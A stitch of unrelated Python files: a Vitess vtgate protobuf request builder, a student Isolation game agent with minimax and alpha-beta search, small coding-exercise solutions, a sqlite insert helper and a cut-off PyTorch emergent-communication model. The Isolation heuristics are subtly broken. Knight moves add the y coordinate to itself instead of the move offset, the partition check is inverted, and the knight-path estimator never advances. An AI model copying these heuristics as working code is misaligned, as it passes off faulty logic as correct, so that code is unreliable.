"""Builds a python rowset from proto3 response.
Args:
query_result: proto3 query.QueryResult object.
Returns:
Array of rows
Number of modified rows
Last insert ID
Fields array of (name, type) tuples.
"""
if not query_result:
return [], 0, 0, []
fields, convs = self.build_conversions(query_result.fields)
results = []
for row in query_result.rows:
results.append(tuple(make_row(row, convs)))
rowcount = query_result.rows_affected
lastrowid = query_result.insert_id
return results, rowcount, lastrowid, fields
def begin_request(self, effective_caller_id, single_db):
"""Builds a vtgate_pb2.BeginRequest object.
Also remembers the effective caller id for next call to
commit_request or rollback_request.
Args:
effective_caller_id: optional vtgate_client.CallerID.
single_db: True if single db transaction is needed.
Returns:
A vtgate_pb2.BeginRequest object.
"""
request = vtgate_pb2.BeginRequest()
request.single_db = single_db
self._add_caller_id(request, effective_caller_id)
self._effective_caller_id = effective_caller_id
return request
def commit_request(self, twopc):
"""Builds a vtgate_pb2.CommitRequest object.
Uses the effective_caller_id saved from begin_request().
It will also clear the saved effective_caller_id.
Args:
twopc: perform 2-phase commit.
Returns:
A vtgate_pb2.CommitRequest object.
"""
request = vtgate_pb2.CommitRequest()
request.atomic = twopc
self._add_caller_id(request, self._effective_caller_id)
self._add_session(request)
self._effective_caller_id = None
return request
def rollback_request(self):
"""Builds a vtgate_pb2.RollbackRequest object.
Uses the effective_caller_id saved from begin_request().
It will also clear the saved effective_caller_id.
Returns:
A vtgate_pb2.RollbackRequest object.
"""
request = vtgate_pb2.RollbackRequest()
self._add_caller_id(request, self._effective_caller_id)
self._add_session(request)
self._effective_caller_id = None
return request
def execute_request_and_name(self, sql, bind_variables, tablet_type,
keyspace_name,
shards,
keyspace_ids,
key_ranges,
entity_column_name, entity_keyspace_id_map,
not_in_transaction, effective_caller_id,
include_event_token, compare_event_token):
"""Builds the right vtgate_pb2 Request and method for an _execute call.
Args:
sql: the query to run. Bind Variables in there should be in python format.
bind_variables: python map of bind variables.
tablet_type: string tablet type.
keyspace_name: keyspace to apply the query to.
shards: array of strings representing the shards.
keyspace_ids: array of keyspace ids.
key_ranges: array of keyrange.KeyRange objects.
entity_column_name: the column name to vary.
entity_keyspace_id_map: map of external id to keyspace id.
not_in_transaction: do not create a transaction to a new shard.
effective_caller_id: optional vtgate_client.CallerID.
include_event_token: boolean on whether to ask for event token.
compare_event_token: set the result extras fresher based on this token.
Returns:
A vtgate_pb2.XXXRequest object.
A dict that contains the routing parameters.
The name of the remote method called.
"""
if shards is not None:
request = vtgate_pb2.ExecuteShardsRequest(keyspace=keyspace_name)
request.shards.extend(shards)
routing_kwargs = {'shards': shards}
method_name = 'ExecuteShards'
elif keyspace_ids is not None:
request = vtgate_pb2.ExecuteKeyspaceIdsRequest(keyspace=keyspace_name)
request.keyspace_ids.extend(keyspace_ids)
routing_kwargs = {'keyspace_ids': keyspace_ids}
method_name = 'ExecuteKeyspaceIds'
elif key_ranges is not None:
request = vtgate_pb2.ExecuteKeyRangesRequest(keyspace=keyspace_name)
self._add_key_ranges(request, key_ranges)
routing_kwargs = {'keyranges': key_ranges}
method_name = 'ExecuteKeyRanges'
elif entity_keyspace_id_map is not None:
request = vtgate_pb2.ExecuteEntityIdsRequest(
keyspace=keyspace_name,
entity_column_name=entity_column_name)
self._convert_entity_ids(entity_keyspace_id_map,
request.entity_keyspace_ids)
routing_kwargs = {'entity_keyspace_id_map': entity_keyspace_id_map,
'entity_column_name': entity_column_name}
method_name = 'ExecuteEntityIds'
else:
request = vtgate_pb2.ExecuteRequest()
if keyspace_name:
request.keyspace_shard = keyspace_name
routing_kwargs = {}
method_name = 'Execute'
request.query.sql = sql
convert_bind_vars(bind_variables, request.query.bind_variables)
request.tablet_type = topodata_pb2.TabletType.Value(tablet_type.upper())
request.not_in_transaction = not_in_transaction
self._add_caller_id(request, effective_caller_id)
self._add_session(request)
if include_event_token:
request.options.include_event_token = True
if compare_event_token:
request.options.compare_event_token.CopyFrom(compare_event_token)
self.event_token = None
self.fresher = None
return request, routing_kwargs, method_name
def process_execute_response(self, exec_method, response):
"""Processes an Execute* response, and returns the rowset.
Args:
exec_method: name of the method called.
response: proto3 response returned.
Returns:
results: list of rows.
rowcount: how many rows were affected.
lastrowid: auto-increment value for the last row inserted.
fields: describes the field names and types.
"""
self.update_session(response)
self._extract_rpc_error(exec_method, response.error)
if response.result.extras:
self.event_token = response.result.extras.event_token
self.fresher = response.result.extras.fresher
return self._get_rowset_from_query_result(response.result)
def execute_batch_request_and_name(self, sql_list, bind_variables_list,
keyspace_list,
keyspace_ids_list, shards_list,
tablet_type, as_transaction,
effective_caller_id):
"""Builds the right vtgate_pb2 ExecuteBatch query.
Args:
sql_list: list os SQL statements.
bind_variables_list: list of bind variables.
keyspace_list: list of keyspaces.
keyspace_ids_list: list of list of keyspace_ids.
shards_list: list of shards.
tablet_type: target tablet type.
as_transaction: execute all statements in a single transaction.
effective_caller_id: optional vtgate_client.CallerID.
Returns:
A proper vtgate_pb2.ExecuteBatchXXX object.
The name of the remote method to call.
"""
if keyspace_ids_list and keyspace_ids_list[0]:
request = vtgate_pb2.ExecuteBatchKeyspaceIdsRequest()
for sql, bind_variables, keyspace_name, keyspace_ids in zip(
sql_list, bind_variables_list, keyspace_list, keyspace_ids_list):
query = request.queries.add(keyspace=keyspace_name)
query.query.sql = sql
convert_bind_vars(bind_variables, query.query.bind_variables)
query.keyspace_ids.extend(keyspace_ids)
method_name = 'ExecuteBatchKeyspaceIds'
else:
request = vtgate_pb2.ExecuteBatchShardsRequest()
for sql, bind_variables, keyspace_name, shards in zip(
sql_list, bind_variables_list, keyspace_list, shards_list):
query = request.queries.add(keyspace=keyspace_name)
query.query.sql = sql
convert_bind_vars(bind_variables, query.query.bind_variables)
query.shards.extend(shards)
method_name = 'ExecuteBatchShards'
request.tablet_type = topodata_pb2.TabletType.Value(tablet_type.upper())
request.as_transaction = as_transaction
self._add_caller_id(request, effective_caller_id)
self._add_session(request)
return request, method_name
def process_execute_batch_response(self, exec_method, response):
"""Processes an ExecuteBatch* response, and returns the rowsets.
Args:
exec_method: name of the method called.
response: proto3 response returned.
Returns:
rowsets: array of tuples as would be returned by an execute method.
"""
self.update_session(response)
self._extract_rpc_error(exec_method, response.error)
rowsets = []
for result in response.results:
rowset = self._get_rowset_from_query_result(result)
rowsets.append(rowset)
return rowsets
def update_stream_request(self,
keyspace_name,
shard,
key_range,
tablet_type,
timestamp,
event,
effective_caller_id):
"""Builds the right vtgate_pb2 UpdateStreamRequest.
Args:
keyspace_name: keyspace to apply the query to.
shard: shard to ask for.
key_range: keyrange.KeyRange object.
tablet_type: string tablet type.
timestamp: when to start the stream from.
event: alternate way to describe where to start the stream from.
effective_caller_id: optional vtgate_client.CallerID.
Returns:
A vtgate_pb2.UpdateStreamRequest object.
"""
request = vtgate_pb2.UpdateStreamRequest(keyspace=keyspace_name,
tablet_type=tablet_type,
shard=shard)
if timestamp:
request.timestamp = timestamp
if event:
if event.timestamp:
request.event.timestamp = event.timestamp
if event.shard:
request.event.shard = event.shard
if event.position:
request.event.position = event.position
if key_range:
request.key_range.start = key_range.Start
request.key_range.end = key_range.End
self._add_caller_id(request, effective_caller_id)
return request
def message_stream_request(self,
keyspace_name,
shard,
key_range,
name,
effective_caller_id):
"""Builds the right vtgate_pb2 MessageStreamRequest.
Args:
keyspace_name: keyspace to apply the query to.
shard: shard to ask for.
key_range: keyrange.KeyRange object.
name: message table name.
effective_caller_id: optional vtgate_client.CallerID.
Returns:
A vtgate_pb2.MessageStreamRequest object.
"""
request = vtgate_pb2.MessageStreamRequest(keyspace=keyspace_name,
name=name,
shard=shard)
if key_range:
request.key_range.start = key_range.Start
request.key_range.end = key_range.End
self._add_caller_id(request, effective_caller_id)
return request
def message_ack_request(self,
keyspace_name,
name,
ids,
effective_caller_id):
"""Builds the right vtgate_pb2 MessageAckRequest.
Args:
keyspace_name: keyspace to apply the query to.
name: message table name.
ids: list of message ids.
effective_caller_id: optional vtgate_client.CallerID.
Returns:
A vtgate_pb2.MessageAckRequest object.
"""
vals = []
for v in ids:
vals.append(build_value(v))
request = vtgate_pb2.MessageAckRequest(keyspace=keyspace_name,
name=name,
ids=vals)
self._add_caller_id(request, effective_caller_id)
return request
def stream_execute_request_and_name(self, sql, bind_variables, tablet_type,
keyspace_name,
shards,
keyspace_ids,
key_ranges,
effective_caller_id):
"""Builds the right vtgate_pb2 Request and method for a _stream_execute.
Args:
sql: the query to run. Bind Variables in there should be in python format.
bind_variables: python map of bind variables.
tablet_type: string tablet type.
keyspace_name: keyspace to apply the query to.
shards: array of strings representing the shards.
keyspace_ids: array of keyspace ids.
key_ranges: array of keyrange.KeyRange objects.
effective_caller_id: optional vtgate_client.CallerID.
Returns:
A vtgate_pb2.StreamExecuteXXXXRequest object.
A dict that contains the routing parameters.
The name of the remote method called.
"""
if shards is not None:
request = vtgate_pb2.StreamExecuteShardsRequest(keyspace=keyspace_name)
request.shards.extend(shards)
routing_kwargs = {'shards': shards}
method_name = 'StreamExecuteShards'
elif keyspace_ids is not None:
request = vtgate_pb2.StreamExecuteKeyspaceIdsRequest(
keyspace=keyspace_name)
request.keyspace_ids.extend(keyspace_ids)
routing_kwargs = {'keyspace_ids': keyspace_ids}
method_name = 'StreamExecuteKeyspaceIds'
elif key_ranges is not None:
request = vtgate_pb2.StreamExecuteKeyRangesRequest(keyspace=keyspace_name)
self._add_key_ranges(request, key_ranges)
routing_kwargs = {'keyranges': key_ranges}
method_name = 'StreamExecuteKeyRanges'
else:
request = vtgate_pb2.StreamExecuteRequest()
if keyspace_name:
request.keyspace_shard = keyspace_name
routing_kwargs = {}
method_name = 'StreamExecute'
request.query.sql = sql
convert_bind_vars(bind_variables, request.query.bind_variables)
request.tablet_type = topodata_pb2.TabletType.Value(tablet_type.upper())
self._add_caller_id(request, effective_caller_id)
return request, routing_kwargs, method_name
def srv_keyspace_proto3_to_old(self, sk):
"""Converts a proto3 SrvKeyspace.
Args:
sk: proto3 SrvKeyspace.
Returns:
dict with converted values.
"""
result = {}
if sk.sharding_column_name:
result['ShardingColumnName'] = sk.sharding_column_name
if sk.sharding_column_type == 1:
result['ShardingColumnType'] = keyrange_constants.KIT_UINT64
elif sk.sharding_column_type == 2:
result['ShardingColumnType'] = keyrange_constants.KIT_BYTES
sfmap = {}
for sf in sk.served_from:
tt = keyrange_constants.PROTO3_TABLET_TYPE_TO_STRING[sf.tablet_type]
sfmap[tt] = sf.keyspace
result['ServedFrom'] = sfmap
if sk.partitions:
pmap = {}
for p in sk.partitions:
tt = keyrange_constants.PROTO3_TABLET_TYPE_TO_STRING[p.served_type]
srs = []
for sr in p.shard_references:
result_sr = {
'Name': sr.name,
}
if sr.key_range:
result_sr['KeyRange'] = {
'Start': sr.key_range.start,
'End': sr.key_range.end,
}
srs.append(result_sr)
pmap[tt] = {
'ShardReferences': srs,
}
result['Partitions'] = pmap
return result
def keyspace_from_response(self, name, response):
"""Builds a Keyspace object from the response of a GetSrvKeyspace call.
Args:
name: keyspace name.
response: a GetSrvKeyspaceResponse object.
Returns:
A keyspace.Keyspace object.
"""
return keyspace.Keyspace(
name,
self.srv_keyspace_proto3_to_old(response.srv_keyspace))
|
"""Finish all TODO items in this file to complete the isolation project, then
test your agent's strength against a set of known agents using tournament.py
and include the results in your report.
"""
import random
directions = [(-2, -1), (-2, 1), (-1, -2), (-1, 2),
(1, -2), (1, 2), (2, -1), (2, 1)]
class SearchTimeout(Exception):
"""Subclass base exception for code clarity. """
pass
def get_moving_area_for_player(game, player):
"""
Parameters
----------
game : `isolation.Board`
player : CustomPlayer
Returns
-------
(int,set)
* distance from border to initial location
* the area that this player reach
"""
remaining = set(game.get_blank_spaces())
player_location = game.get_player_location(player)
next = set([player_location])
search_space = set()
# We may not be able to go through all locations, let's narrow the search space
has_move = True
border = 0
while has_move:
has_move = False
current_round = next
next = set()
for starting_position in current_round:
for direction in directions:
next_position = (starting_position[0] + direction[0], starting_position[1] + starting_position[1])
if next_position in remaining:
remaining.remove(next_position)
next.add(next_position)
search_space.add(next_position)
has_move = True
if has_move:
border += 1
return border, search_space
def get_max_step_for_player(game, player):
"""
Because a knight's movement follows a bipatite graph, we find the 2 sub graphs and assign findings there. The
maximum numbers of moves is limited to 2x the size of the smaller set, and a bonus step if there are more positions
in the even set
http://mathworld.wolfram.com/KnightGraph.html
Parameters
----------
game
player
Returns
-------
(int,set)
upper limit of number of steps we can take
"""
remaining = set(game.get_blank_spaces())
player_location = game.get_player_location(player)
next = set([player_location])
moving_area = set()
# We may not be able to go through all locations, let's narrow the search space
has_move = True
odd_steps = 0
even_steps = 0
is_odd_step = True
while has_move:
has_move = False
current_round = next
next = set()
for starting_position in current_round:
for direction in directions:
next_position = (starting_position[0] + direction[0], starting_position[1] + starting_position[1])
if next_position in remaining:
remaining.remove(next_position)
next.add(next_position)
moving_area.add(next_position)
if is_odd_step:
odd_steps += 1
else:
even_steps += 1
has_move = True
max_steps = min(odd_steps, even_steps)
# Bonus step
if even_steps > odd_steps:
max_steps += 1
return max_steps, moving_area
def real_steps_score(game, player):
"""
Heuristic based on the difference between number of steps that each player can take
Parameters
----------
game : `isolation.Board`
player
Returns
-------
"""
if game.is_winner(player):
return float('inf')
elif game.is_loser(player):
return float('-inf')
opponent = game.get_opponent(player)
max_p_steps, area = get_max_step_for_player(game, player)
max_o_steps, o_area = get_max_step_for_player(game, opponent)
score = max_p_steps - max_o_steps
# If it's player's turn, deduct 0.5 point for the disadvantage
if game.active_player == player:
score -= 0.5
# If there is partition, search for end game
if len(area.intersection(o_area)):
# To do: a proper end-game search
if max_p_steps > max_o_steps:
return float('inf')
elif max_p_steps < max_o_steps:
return float('-inf')
return score
def combined_score(game, player):
"""
Combine the improved_score with real_steps_score after N moves
Parameters
----------
game: `isolation.Board`
player
Returns
-------
float
"""
# Let's be a bit greedy during first half of the game
if game.move_count < (game.width + game.height / 2):
return improved_score(game, player) * 5
# Decision time
return real_steps_score(game, player)
def moving_area_score(game, player):
"""
Scoring heurstic based on the difference between the players' available moving area/space
Parameters
----------
game: `isolation.Board`
player: CustomPlayer
Returns
-------
float
difference in number of possible steps
"""
if game.is_winner(player):
return float('inf')
elif game.is_loser(player):
return float('-inf')
opponent = game.get_opponent(player)
player_step, possibilities = get_moving_area_for_player(game, player)
opponent_step, opp_possibilities = get_moving_area_for_player(game, opponent)
return float(player_step * len(possibilities) - opponent_step * len(opp_possibilities))
def improved_score(game, player):
"""The "Improved" evaluation function discussed in lecture that outputs a
score equal to the difference in the number of moves available to the
two players.
Parameters
----------
game : `isolation.Board`
An instance of `isolation.Board` encoding the current state of the
game (e.g., player locations and blocked cells).
player : hashable
One of the objects registered by the game object as a valid player.
(i.e., `player` should be either game.__player_1__ or
game.__player_2__).
Returns
----------
float
The heuristic value of the current game state
"""
if game.is_loser(player):
return float("-inf")
if game.is_winner(player):
return float("inf")
own_moves = len(game.get_legal_moves(player))
opp_moves = len(game.get_legal_moves(game.get_opponent(player)))
return float(own_moves - opp_moves)
def get_moves_from_position(available_squares, position):
"""
Find the available moves from `position`
Parameters
----------
available_squares: set
position: (int,int)
Returns
-------
set of (int,int)
moves from specified position among the set
"""
moves = set()
for direction in directions:
next_move = (position[0] + direction[0], position[1] + position[1])
if next_move in available_squares:
moves.add(next_move)
return moves
def knight_heuristic(game, start_position):
"""
Estimate the the longest path that a knight can take by moving on the most narrow path (least option 1-step ahead).
This function is used in the knight_only_score heuristic.
Parameters
----------
game: `isolation.Board`
start_position: (int,int)
Returns
-------
int
estimated longest path for a knight
"""
if start_position == (-1, -1):
return 0
search_space = set(game.get_blank_spaces())
longest_path = 0
current_position = start_position
next_move = start_position
current_move_set = get_moves_from_position(search_space, current_position)
next_move_set = set()
while True:
# print('Loop, current position is {}'.format(current_position))
# Because we can move from current position
longest_path += 1
# Identify a move set with the most restricted paths
current_choice = 9
for move in current_move_set:
this_move_set = get_moves_from_position(search_space, current_position)
# Ensure that we always retain a move
if len(this_move_set) < current_choice and current_choice < 9:
# print('Replacing {} with {}'.format(next_move_set, this_move_set))
# print('Next move is set to {}'.format(move))
# print('Because {} < {}'.format(len(this_move_set), current_choice))
next_move_set = this_move_set
next_move = move
current_choice = len(this_move_set)
# Make the move
if current_choice < 9:
search_space.remove(next_move)
current_move_set = next_move_set
current_position = next_move
else:
break
return longest_path
def game_is_partitioned(game):
"""
Detect whether the game board is partitioned.
Parameters
----------
game: `isolation.Board`
Returns
-------
bool
True if game board is partition, False otherwise
"""
_, area1 = get_moving_area_for_player(game, game.active_player)
_, area2 = get_moving_area_for_player(game, game.inactive_player)
return len(area1.intersection(area2)) > 0
def knight_only_score(game, player):
"""
Knight's movement heuristic, with fallback to deep search when partitioning is detected.
Parameters
----------
game: `isolation.Board`
player
Returns
-------
float
game score from current player's perspective
"""
if game.is_loser(player):
return float("-inf")
if game.is_winner(player):
return float("inf")
if game_is_partitioned(game):
my_score = knight_heuristic(game, game.get_player_location(player))
opp_score = knight_heuristic(game, game.get_player_location(game.get_opponent(player)))
if my_score > opp_score:
return float('inf')
else:
return float('-inf')
else:
own_moves = len(game.get_legal_moves(player))
opp_moves = len(game.get_legal_moves(game.get_opponent(player)))
return float(own_moves - opp_moves)
def meta_score(ratio):
return lambda game, player: smart_score(game, player, ratio)
def smart_score(game, player, ratio=1):
"""
Experimental heuristic tha run a heuristic only after ration*N steps, to be called via meta_score
This function is intended for experimentation only and should be disrecarded in the final submission/evaluation.
Parameters
----------
game: `isolation.Board`
player
Returns
-------
float
score from the perspective of `player`
"""
if game.is_loser(player):
return float("-inf")
if game.is_winner(player):
return float("inf")
if (game.move_count > min(game.width, game.height) * 2) and game_is_partitioned(game):
my_score = knight_heuristic(game, game.get_player_location(player))
opp_score = knight_heuristic(game, game.get_player_location(game.get_opponent(player)))
if my_score > opp_score:
return float('inf')
else:
return float('-inf')
else:
own_moves = len(game.get_legal_moves(player))
opp_moves = len(game.get_legal_moves(game.get_opponent(player)))
return float(own_moves - opp_moves)
custom_score = knight_only_score
custom_score_2 = real_steps_score
custom_score_3 = combined_score
class IsolationPlayer:
"""Base class for minimax and alphabeta agents -- this class is never
constructed or tested directly.
******************** DO NOT MODIFY THIS CLASS ********************
Parameters
----------
search_depth : int (optional)
A strictly positive integer (i.e., 1, 2, 3,...) for the number of
layers in the game tree to explore for fixed-depth search. (i.e., a
depth of one (1) would only explore the immediate sucessors of the
current state.)
score_fn : callable (optional)
A function to use for heuristic evaluation of game states.
timeout : float (optional)
Time remaining (in milliseconds) when search is aborted. Should be a
positive value large enough to allow the function to return before the
timer expires.
"""
def __init__(self, search_depth=3, score_fn=custom_score, timeout=10.):
self.search_depth = search_depth
self.score = score_fn
self.time_left = None
self.TIMER_THRESHOLD = timeout
class MinimaxPlayer(IsolationPlayer):
"""Game-playing agent that chooses a move using depth-limited minimax
search. You must finish and test this player to make sure it properly uses
minimax to return a good move before the search time limit expires.
"""
def get_move(self, game, time_left):
"""Search for the best move from the available legal moves and return a
result before the time limit expires.
************** YOU DO NOT NEED TO MODIFY THIS FUNCTION *************
For fixed-depth search, this function simply wraps the call to the
minimax method, but this method provides a common interface for all
Isolation agents, and you will replace it in the AlphaBetaPlayer with
iterative deepening search.
Parameters
----------
game : `isolation.Board`
An instance of `isolation.Board` encoding the current state of the
game (e.g., player locations and blocked cells).
time_left : callable
A function that returns the number of milliseconds left in the
current turn. Returning with any less than 0 ms remaining forfeits
the game.
Returns
-------
(int, int)
Board coordinates corresponding to a legal move; may return
(-1, -1) if there are no available legal moves.
"""
self.time_left = time_left
# Initialize the best move so that this function returns something
# in case the search fails due to timeout
best_move = (-1, -1)
try:
# The try/except block will automatically catch the exception
# raised when the timer is about to expire.
return self.minimax(game, self.search_depth)
except SearchTimeout:
pass # Handle any actions required after timeout as needed
# Return the best move from the last completed search iteration
return best_move
def minimax(self, game, depth):
"""Implement depth-limited minimax search algorithm as described in
the lectures.
This should be a modified version of MINIMAX-DECISION in the AIMA text.
https://github.com/aimacode/aima-pseudocode/blob/master/md/Minimax-Decision.md
**********************************************************************
You MAY add additional methods to this class, or define helper
functions to implement the required functionality.
**********************************************************************
Parameters
----------
game : isolation.Board
An instance of the Isolation game `Board` class representing the
current game state
depth : int
Depth is an integer representing the maximum number of plies to
search in the game tree before aborting
Returns
-------
(int, int)
The board coordinates of the best move found in the current search;
(-1, -1) if there are no legal moves
Notes
-----
(1) You MUST use the `self.score()` method for board evaluation
to pass the project tests; you cannot call any other evaluation
function directly.
(2) If you use any helper functions (e.g., as shown in the AIMA
pseudocode) then you must copy the timer check into the top of
each helper function or else your agent will timeout during
testing.
"""
if self.time_left() < self.TIMER_THRESHOLD:
raise SearchTimeout()
(score, best_move) = self.minimax_with_score(game, depth, True)
return best_move
def minimax_with_score(self, game, depth, maximizing_player=True):
"""Implement the minimax search algorithm as described in the lectures.
Parameters
----------
game : isolation.Board
An instance of the Isolation game `Board` class representing the
current game state
depth : int
Depth is an integer representing the maximum number of plies to
search in the game tree before aborting
maximizing_player : bool
Flag indicating whether the current search depth corresponds to a
maximizing layer (True) or a minimizing layer (False)
Returns
-------
float
The score for the current search branch
tuple(int, int)
The best move for the current branch; (-1, -1) for no legal moves
Notes
-----
(1) You MUST use the `self.score()` method for board evaluation
to pass the project unit tests; you cannot call any other
evaluation function directly.
"""
if self.time_left() < self.TIMER_THRESHOLD:
raise SearchTimeout()
# Terminal node
if depth == 0:
score_fn = self.score
return score_fn(game, self), (-1, -1)
# Going to the next level
best_score = float('-inf') if maximizing_player else float('inf')
best_move = (-1, -1)
posible_moves = game.get_legal_moves()
for move in posible_moves:
sub_game = game.forecast_move(move)
sub_score, _ = self.minimax_with_score(sub_game, depth - 1, not maximizing_player)
if maximizing_player:
if sub_score > best_score:
best_move = move
best_score = sub_score
if sub_score == float('inf'):
return best_score, best_move
else:
if sub_score < best_score:
best_move = move
best_score = sub_score
if sub_score == float('-inf'):
return best_score, best_move
return (best_score, best_move)
class AlphaBetaPlayer(IsolationPlayer):
"""Game-playing agent that chooses a move using iterative deepening minimax
search with alpha-beta pruning. You must finish and test this player to
make sure it returns a good move before the search time limit expires.
"""
def get_move(self, game, time_left):
"""Search for the best move from the available legal moves and return a
result before the time limit expires.
Modify the get_move() method from the MinimaxPlayer class to implement
iterative deepening search instead of fixed-depth search.
**********************************************************************
NOTE: If time_left() < 0 when this function returns, the agent will
forfeit the game due to timeout. You must return _before_ the
timer reaches 0.
**********************************************************************
Parameters
----------
game : `isolation.Board`
An instance of `isolation.Board` encoding the current state of the
game (e.g., player locations and blocked cells).
time_left : callable
A function that returns the number of milliseconds left in the
current turn. Returning with any less than 0 ms remaining forfeits
the game.
Returns
-------
(int, int)
Board coordinates corresponding to a legal move; may return
(-1, -1) if there are no available legal moves.
"""
self.time_left = time_left
legal_moves = game.get_legal_moves(game.active_player)
if len(legal_moves) == 0:
return (-1, -1)
best_score, best_move = float("-inf"), legal_moves[0]
try:
max_depth = 1
while True:
if self.time_left() < self.TIMER_THRESHOLD:
raise SearchTimeout()
best_move = self.alphabeta(game, max_depth)
max_depth += 1
except SearchTimeout:
return best_move
return best_move
def alphabeta(self, game, depth, alpha=float("-inf"), beta=float("inf")):
"""Implement depth-limited minimax search with alpha-beta pruning as
described in the lectures.
This should be a modified version of ALPHA-BETA-SEARCH in the AIMA text
https://github.com/aimacode/aima-pseudocode/blob/master/md/Alpha-Beta-Search.md
**********************************************************************
You MAY add additional methods to this class, or define helper
functions to implement the required functionality.
**********************************************************************
Parameters
----------
game : isolation.Board
An instance of the Isolation game `Board` class representing the
current game state
depth : int
Depth is an integer representing the maximum number of plies to
search in the game tree before aborting
alpha : float
Alpha limits the lower bound of search on minimizing layers
beta : float
Beta limits the upper bound of search on maximizing layers
Returns
-------
(int, int)
The board coordinates of the best move found in the current search;
(-1, -1) if there are no legal moves
Notes
-----
(1) You MUST use the `self.score()` method for board evaluation
to pass the project tests; you cannot call any other evaluation
function directly.
(2) If you use any helper functions (e.g., as shown in the AIMA
pseudocode) then you must copy the timer check into the top of
each helper function or else your agent will timeout during
testing.
"""
if self.time_left() < self.TIMER_THRESHOLD:
raise SearchTimeout()
(score, best_move) = self.alphabeta_with_score(game, depth, alpha, beta, True)
return best_move
def alphabeta_with_score(self, game, depth, alpha=float("-inf"), beta=float("inf"), maximizing_player=True):
"""Implement minimax search with alpha-beta pruning as described in the
lectures.
Parameters
----------
game : isolation.Board
An instance of the Isolation game `Board` class representing the
current game state
depth : int
Depth is an integer representing the maximum number of plies to
search in the game tree before aborting
alpha : float
Alpha limits the lower bound of search on minimizing layers
beta : float
Beta limits the upper bound of search on maximizing layers
maximizing_player : bool
Flag indicating whether the current search depth corresponds to a
maximizing layer (True) or a minimizing layer (False)
Returns
-------
float
The score for the current search branch
tuple(int, int)
The best move for the current branch; (-1, -1) for no legal moves
Notes
-----
(1) You MUST use the `self.score()` method for board evaluation
to pass the project unit tests; you cannot call any other
evaluation function directly.
"""
if self.time_left() < self.TIMER_THRESHOLD:
raise SearchTimeout()
if depth == 0:
score_fn = self.score
return score_fn(game, self), (-1, -1)
if maximizing_player:
best_score, best_move = float('-inf'), (-1, -1)
for move in game.get_legal_moves(self):
sub_game = game.forecast_move(move)
sub_score, _ = self.alphabeta_with_score(sub_game, depth - 1, alpha, beta, False)
if sub_score >= best_score:
best_score, best_move = sub_score, move
alpha = max(alpha, best_score)
if beta <= alpha:
break
else:
best_score, best_move = float('inf'), (-1, -1)
for move in game.get_legal_moves(game.get_opponent(self)):
sub_game = game.forecast_move(move)
sub_score, _ = self.alphabeta_with_score(sub_game, depth - 1, alpha, beta, True)
if sub_score <= best_score:
best_score, best_move = sub_score, move
beta = min(beta, best_score)
if (beta <= alpha):
break
return (best_score, best_move)
|
u = int(input())
while u > 0:
n,x,t = map(int,input().split())
start = []
for i in range(n):
start.append(i*x)
#print(start)
end = []
for i in range(n):
end.append(start[i]+t)
#print(end)
stor = []
for k in range(n-1):
a = end[k]
cnt = 0
for j in range(k+1,n,+1):
if a >= start[j] and a <= end[j]:
cnt+=1
stor.append(cnt)
print(sum(stor))
u = u-1
|
import sqlite3 as lite
import sys
def setupTables(name='P50Events.sqlite'):
con=lite.connect(name)
with con:
cur = con.cursor()
cur.execute("CREATE TABLE P50Muon(event INT,pulseTop REAL,pulseBot REAL,renormTop REAL,renormBot REAL,length REAL,time REAL)")
def insertEvent(event,pulseTop,pulseBot,renormTop,renormBot,length,time,name='P50Events.sqlite',table='P50Muon') :
con=lite.connect(name)
with con:
cmd="INSERT INTO %s VALUES(%d,%f,%f,%f,%f,%f,%f)" %(table,event,pulseTop,pulseBot,renormTop,renormBot,length,time)
# print cmd
cur = con.cursor()
cur.execute(cmd)
# def addCol(name,Type,table='P50Muon'):
# cmd="ALTER TABLE %s ADD COLUMN %s %s " %(table,name,Type)
# print cmd
|
class Solution(object):
def findTilt(self, root):
self.total = 0
def addtraverse(root):
if not root:
return 0
l = r = 0
if root.left:
l = addtraverse(root.left)
if root.right:
r = addtraverse(root.right)
self.total += abs(l-r)
return l + r + root.val
addtraverse(root)
return(self.total)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions import Categorical
import os
from model_utils import RnnEncoder
from model_utils import TwoLayerMLP
from vision import Vision
from amdim.model import Model
class Agent(nn.Module):
def __init__(self, agent_hps=None, vision_hps=None):
super(Agent, self).__init__()
# agent hps
self.hidden_size = agent_hps["hidden_size"]
self.vocab_size = agent_hps["vocab_size"]
self.emb_size = agent_hps["emb_size"]
self.message_length = agent_hps["message_length"]
# shared embedding layer
self.shared_embedding = nn.Embedding(self.vocab_size, self.emb_size)
self.sos_embedding = nn.Parameter(torch.zeros(self.emb_size))
# shared vision + linear layers
self.input_channels = vision_hps["input_channels"]
self.vision_ckpt = vision_hps["vision_ckpt"]
self.vision = Vision(self.input_channels)
self.fc = nn.Linear(576, self.hidden_size)
# sender modules
self.sender_decoder = nn.LSTMCell(self.emb_size, self.hidden_size)
self.sender_hidden_to_output = nn.Linear(self.hidden_size, self.vocab_size)
# receiver modules
self.receiver_encoder = RnnEncoder(self.vocab_size, self.shared_embedding, self.hidden_size, "lstm")
def forward(self, mode, **kwargs):
if mode == "sender":
output = self.sender_forward(tgt_img=kwargs["tgt_img"]) # message
elif mode == "receiver":
output = self.receiver_forward(imgs=kwargs["imgs"], message=kwargs["message"]) # prediction
return output
def sender_forward(self, tgt_img):
enc_outputs = self.vision(tgt_img)
feature_vector = enc_outputs.view(enc_outputs.size(0), -1) # b * features
ht = self.fc(feature_vector) # b * 1 * self.hidden_size
ct = torch.zeros_like(ht)
et = torch.stack([self.sos_embedding] * ht.size(0))
message = []
log_probs = []
entropy = []
for i in range(self.message_length - 1):
ht, ct = self.sender_decoder(et, (ht, ct))
step_logits = F.softmax(self.sender_hidden_to_output(ht), dim=1)
distr = Categorical(probs=step_logits)
if self.training:
token = distr.sample()
else:
token = step_logits.argmax(dim=1)
et = self.shared_embedding(token)
message.append(token)
log_probs.append(distr.log_prob(token))
entropy.append(distr.entropy())
message = torch.stack(message).permute(1, 0)
log_probs = torch.stack(log_probs).permute(1, 0)
entropy = torch.stack(entropy).permute(1, 0)
zeros = torch.zeros((message.size(0), 1)).to(message.device)
message = torch.cat([message, zeros.long()], dim=1)
log_probs = torch.cat([log_probs, zeros], dim=1)
entropy = torch.cat([entropy, zeros], dim=1)
return message, log_probs, entropy
def receiver_forward(self, message, imgs):
batch_size = message.size(0)
num_imgs = imgs.size(1)
imgs = imgs.view(batch_size*num_imgs, self.input_channels, 64, 64)
enc_outputs = self.vision(imgs)
feature_vectors = enc_outputs.view(batch_size*num_imgs, -1) # b*num_imgs * features
feature_vectors = self.fc(feature_vectors) # b*num_imgs * self.hidden_size
